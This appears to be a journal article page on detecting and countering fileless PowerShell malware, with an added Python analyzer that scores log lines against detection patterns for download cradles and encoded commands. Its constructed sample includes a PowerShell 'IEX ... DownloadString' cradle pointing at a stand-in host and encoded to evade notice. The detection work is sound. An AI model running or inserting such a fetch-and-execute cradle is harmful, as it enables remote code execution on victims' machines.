Measures to counter threat to intelligent systems from fileless malware

DOI: 10.31673/2412-9070.2022.030311

Authors

  • Ю. І. Катков, (Katkov Yu. I.) State University of Telecommunications, Kyiv
  • О. В. Зінченко, (Zinchenko O. V.) State University of Telecommunications, Kyiv
  • С. С. Цибульник, (Tsybulʹnyk S. S.) State University of Telecommunications, Kyiv
  • Ю. О. Вітенко, (Vitenko Yu. O.) State University of Telecommunications, Kyiv

DOI:

https://doi.org/10.31673/2412-9070.2022.030311

Abstract

The article is devoted to the topical issue of finding means of countering threats to intelligent systems from fileless malware. The task: in order to localize in time and minimize possible damage from the impact of threats (vulnerabilities, attacks) from fileless malware on critical IT objects — the infrastructure of the enterprise’s intelligent systems, it is necessary to determine the best direction for creating methods for their timely detection. The article shows that the enterprise’s intelligent system is vulnerable and critical even under weak influence of the attacker’s threats (vulnerabilities, attacks) on critical objects of the enterprise’s IT infrastructure. As a result, the contradiction between the complexity of the methods of protecting objects of the enterprise’s critical IT infrastructure from malicious software, including fileless malware, and their effectiveness in terms of timely localization and minimization of possible damage from the influence of threats is exacerbated. Resolution of this contradiction is possible through the creation of flexible organizational structures for monitoring synergistic representations of the process by which the enterprise’s intelligent systems adapt to threats from fileless malware. It is shown that, first of all, there is a need for constant improvement of the methods of detecting the impact of threats, in the direction of predicting them. To this end, based on an analysis of the algorithm of fileless malware delivered through exploit kits, malicious Microsoft Word macros and compromised network equipment, a mechanism of influence through PowerShell on Windows and Unix operating systems was determined. Actions to protect against fileless malware are proposed on the basis of this mechanism. To implement these actions, it is shown how it is possible to search for macros and to detect and confirm the presence of fileless threats. It is proposed to verify the enterprise’s information security using audit methods. The Red Teaming attack-simulation methodology and penetration testing methods are proposed as the main audit method. Ways to use them are considered.
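As an added illustration of the "detect and confirm" step the abstract describes (example code written for this page, not the article's own method): a small analyzer that scores PowerShell script block log lines for the traits the abstract names as the fileless mechanism (hidden windows, encoded commands, in-memory download cradles) and decodes the -EncodedCommand payload so the finding can be confirmed rather than guessed. The log lines, indicator weights and threshold are constructed assumptions.

```python
import base64
import binascii
import re

# Indicators commonly seen in PowerShell script block logs (Event ID 4104) when
# fileless tooling is involved. The weights are assumptions made for this example.
INDICATORS = {
    "encoded_command": (r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", 3),
    "hidden_window": (r"-w(?:indowstyle)?\s+hidden", 2),
    "policy_bypass": (r"-ex(?:ecutionpolicy)?\s+bypass|-nop\b|-noprofile\b", 1),
    "download_cradle": (r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest", 3),
    "in_memory_exec": (r"\bIEX\b|Invoke-Expression", 2),
}
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(text):
    """Recover the plaintext behind -EncodedCommand (base64 of UTF-16LE), else None."""
    m = ENC_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None

def analyze(text):
    """Score one log line; the decoded payload is scanned too, since encoding is
    used precisely so the cradle never appears in the visible command line."""
    decoded = decode_encoded_command(text)
    hits, score = [], 0
    for name, (pattern, weight) in INDICATORS.items():
        if any(re.search(pattern, view, re.I) for view in (text, decoded or "")):
            hits.append(name)
            score += weight
    return {"text": text, "decoded": decoded, "indicators": hits, "score": score}

def triage(events, threshold=4):
    """Return events scoring at or above threshold, highest score first."""
    findings = [analyze(e) for e in events]
    return sorted((f for f in findings if f["score"] >= threshold), key=lambda f: -f["score"])

# Constructed sample log lines (not real captures); the second hides an
# in-memory download cradle behind -EncodedCommand.
SAMPLE_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"
SAMPLE_EVENTS = [
    "Get-ChildItem C:\\Users\\admin\\Documents -Recurse",
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
    + base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16le")).decode(),
    "Get-Service | Where-Object { $_.Status -eq 'Running' }",
]
```

Running `triage(SAMPLE_EVENTS)` surfaces only the second line, with the decoded cradle attached, while the two administrative commands score zero.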

Keywords: threat model; open source; fileless software; PowerShell.

Published

2023-04-12

Section

Articles